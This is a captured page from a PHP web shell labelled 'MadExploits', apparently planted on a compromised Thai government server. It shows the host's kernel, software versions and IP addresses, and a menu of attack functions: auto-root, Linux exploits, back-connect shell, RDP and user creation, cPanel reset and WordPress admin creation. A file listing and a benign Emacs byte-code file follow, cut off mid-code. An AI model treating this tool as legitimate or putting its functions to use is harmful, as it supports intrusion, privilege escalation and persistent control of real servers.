Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
emacs /
23.1 /
lisp /
obsolete /
[ HOME SHELL ]
Name
Size
Permission
Action
awk-mode.elc
4.27
KB
-rw-r--r--
fast-lock.elc
17.08
KB
-rw-r--r--
iso-acc.elc
12.05
KB
-rw-r--r--
iso-insert.elc
11.71
KB
-rw-r--r--
iso-swed.elc
3.85
KB
-rw-r--r--
keyswap.el
1.37
KB
-rw-r--r--
lazy-lock.elc
24.77
KB
-rw-r--r--
old-whitespace.elc
23.48
KB
-rw-r--r--
options.elc
3.84
KB
-rw-r--r--
resume.elc
2.34
KB
-rw-r--r--
rnews.elc
25.96
KB
-rw-r--r--
rnewspost.elc
11.6
KB
-rw-r--r--
sc.elc
764
B
-rw-r--r--
scribe.elc
9.89
KB
-rw-r--r--
swedish.elc
2.64
KB
-rw-r--r--
vc-mcvs.elc
15.26
KB
-rw-r--r--
x-menu.elc
4.05
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : awk-mode.elc
;ELC ;;; Compiled by mockbuild@c6b8.bsys.dev.centos.org on Thu Feb 19 13:04:38 2015 ;;; from file /builddir/build/BUILD/emacs-23.1/lisp/obsolete/awk-mode.el ;;; in Emacs version 23.1.1 ;;; with all optimizations. ;;; This file uses dynamic docstrings, first added in Emacs 19.29. (if (and (boundp 'emacs-version) (< (aref emacs-version (1- (length emacs-version))) ?A) (or (and (boundp 'epoch::version) epoch::version) (string-lessp emacs-version "19.29"))) (error "`awk-mode.el' was compiled for Emacs 19.29 or later")) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; #@44 Syntax table in use in `awk-mode' buffers. (defvar awk-mode-syntax-table (byte-code "\301 \302\303\304#\210\302\305\306#\210\302\307\306#\210\302\310\311#\210\302\312\313#\210\302\314\315#\210\302\316\315#\210\302\317\315#\210\302\320\315#\210\302\321\315#\210\302\322\315#\210\302\323\315#\210\302\324\315#\210\302\325\315#\210\302\326\327#\210\302\330\313#\210)\207" [st make-syntax-table modify-syntax-entry 92 "\\" 10 "> " 12 35 "< " 47 "\"" 42 "." 43 45 61 37 60 62 38 124 95 "_" 39] 4) (#$ . 616)) #@47 Default expressions to highlight in AWK mode. (defconst awk-font-lock-keywords '(("^[ ]*\\(function\\)\\>[ ]*\\(\\sw+\\)?" (1 font-lock-keyword-face) (2 font-lock-function-name-face nil t)) ("\\<\\(ARG\\(?:IND\\|[CV]\\)\\|CONVFMT\\|E\\(?:NVIRON\\|RRNO\\)\\|F\\(?:I\\(?:ELDWIDTHS\\|LENAME\\)\\|NR\\|S\\)\\|IGNORECASE\\|N[FR]\\|O\\(?:F\\(?:MT\\|S\\)\\|RS\\)\\|R\\(?:LENGTH\\|S\\(?:TART\\)?\\)\\|SUBSEP\\)\\>" . font-lock-variable-name-face) "\\<\\(BEGIN\\|END\\|break\\|continue\\|d\\(?:elete\\|o\\)\\|e\\(?:lse\\|xit\\)\\|for\\|getline\\|if\\|next\\|printf?\\|return\\|while\\)\\>" ("\\<\\(atan2\\|c\\(?:lose\\|os\\|time\\)\\|exp\\|gsub\\|in\\(?:dex\\|t\\)\\|l\\(?:ength\\|og\\)\\|match\\|rand\\|s\\(?:in\\|p\\(?:lit\\|rintf\\)\\|qrt\\|rand\\|ub\\(?:str\\)?\\|ystem\\)\\|t\\(?:ime\\|o\\(?:\\(?:low\\|upp\\)er\\)\\)\\)\\>" 1 font-lock-builtin-face) ("\\(?:![=~]\\|&&\\|<=\\|==\\|>=\\|||\\|[<>~]\\)" . font-lock-constant-face)) (#$ . 1148)) (require 'syntax) #@36 Syntactic keywords for `awk-mode'. (defconst awk-font-lock-syntactic-keywords '(("[^<=>-+*%/!^,~(?:|& \n\f]\\s-*\\(/\\)" (1 (unless (nth 3 (syntax-ppss (match-beginning 1))) ".")))) (#$ . 2112)) (byte-code "\302\303N\204\f \304\302\303\305#\210\306\307!\204 \304\307\310\311#\210\307B\312\307!\204( \313\307\314 \"\210\306\315!\2044 \304\315\310\311#\210\315B\312\315!\204D \313\315\316 \"\210\304\301\310\311#\210\301B\312\301!\204^ \313\301\317\301\320\"\210 \"\210\304\311\321\322#\207" [current-load-list awk-mode-abbrev-table awk-mode-hook variable-documentation put "Hook run when entering AWK mode.\nNo problems result if this variable is not bound.\n`add-hook' automatically binds it. (This is true for all hook variables.)" boundp awk-mode-map definition-name awk-mode default-boundp set-default make-sparse-keymap awk-mode-syntax-table make-syntax-table define-abbrev-table nil derived-mode-parent c-mode] 5) #@303 Major mode for editing AWK code. This is much like C mode except for the syntax of comments. Its keymap inherits from C mode's and it has the same variables for customizing indentation. It has its own abbrev table and its own syntax table. Turning on AWK mode runs `awk-mode-hook'. \{awk-mode-map} (defalias 'awk-mode #[nil "\306\300!\210\307\310 \210\311\312\310\313N\203 \314\311\313\310\313N#\210\315!\204' \316\317 \"\210\320\f!\211\2036 \321 =\203<